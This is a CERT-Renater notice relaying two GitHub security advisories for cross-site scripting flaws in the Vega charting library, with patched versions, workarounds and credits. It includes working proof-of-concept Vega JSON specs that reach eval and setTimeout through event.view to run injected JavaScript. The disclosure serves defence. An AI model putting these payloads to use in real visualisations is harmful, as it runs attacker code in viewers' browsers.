Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN184

_____________________________________________________________________

DATE                : 28/03/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Vega versions prior to 5.32.0,
                       vega-functions versions prior to 5.17.0.

=====================================================================
https://github.com/vega/vega/security/advisories/GHSA-963h-3v39-3pqf
https://github.com/vega/vega/security/advisories/GHSA-rcw3-wmx7-cphr
_____________________________________________________________________

XSS via RegExp.prototype[@@replace]
Moderate
hydrosquall published GHSA-963h-3v39-3pqf Mar 27, 2025

Package
vega (npm)

Affected versions
<= 5.31.0

Patched versions
5.32.0

vega-functions (npm)

Affected versions
<= 5.16.0

Patched versions
5.17.0


Description
Impact

Users running Vega/Vega-lite JSON definitions could run unexpected
JavaScript code when drawing graphs, unless the library is used
with the vega-interpreter.


Workarounds

    Use vega with expression interpreter
    Upgrade to a newer Vega version (5.32.0)

POC Summary

Calling replace with a RegExp-like pattern calls
RegExp.prototype[@@replace], which can then call an
attacker-controlled exec function.


POC Details

Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}).
Since pattern has RegExp.prototype[@@replace], pattern.exec('foo')
winds up being called.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since functions cannot be returned from this, an attacker that
wishes to escalate to XSS must abuse event.view to gain access
to eval.


Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}


Severity
Moderate

CVE ID
CVE-2025-27793

Weaknesses
CWE-87


Credits

    @FallingPineapples FallingPineapples Reporter
    @hydrosquall hydrosquall Remediation developer
    @domoritz domoritz Remediation reviewer

_____________________________________________________________________


XSS in Vega via event filter when not using CSP mode
`expressionInterpeter`

Moderate
hydrosquall published GHSA-rcw3-wmx7-cphr Mar 27, 2025

Package
vega (npm)

Affected versions
<=5.30.0
Patched versions
5.31.0

vega-functions (npm)
Affected versions
<=5.15.0
Patched versions
5.16.0


Description

Impact

In vega 5.30.0 and lower, vega-functions 5.15.0 and lower , it was
possible to call JavaScript functions from the Vega expression
language that were not meant to be supported.


Patches

Patched in vega 5.31.0 / vega-functions 5.16.0


Workarounds

Is there a way for users to fix or remediate the vulnerability
without upgrading?

    Run vega without vega.expressionInterpreter. This mode is
not the default as it is slower.
    Using the interpreter described in CSP safe mode (Content
Security Policy) prevents arbitrary Javascript from running,
so users of this mode are not affected by this vulnerability.


References

    Reported to Vega-Lite by @kprevas Nov 8 2024 in
vega/vega-lite#9469 & #3984

Reproduction of the error in Vega by @mattijn

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "signals": [
    {
      "name": "inject_alert",
      "on": [
        {
          "events": [
            {
              "type": "mousedown",
              "marktype": "rect",
              "filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
            }
          ],
          "update": "datum"
        }
      ]
    }
  ],
  "marks": [
    {
      "type": "rect",
      "encode": {
        "update": {
          "x": {"value": 0},
          "y": {"value": 0},
          "width": {"value": 100},
          "height": {"value": 100}
        }
      }
    }
  ]
}


Severity
Moderate

CVE ID
CVE-2025-26619

Weaknesses
CWE-79

Credits

    @kprevas kprevas Reporter
    @hydrosquall hydrosquall Remediation developer
    @domoritz domoritz Remediation reviewer
    @mattijn mattijn Other
    @lsh lsh Remediation reviewer


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================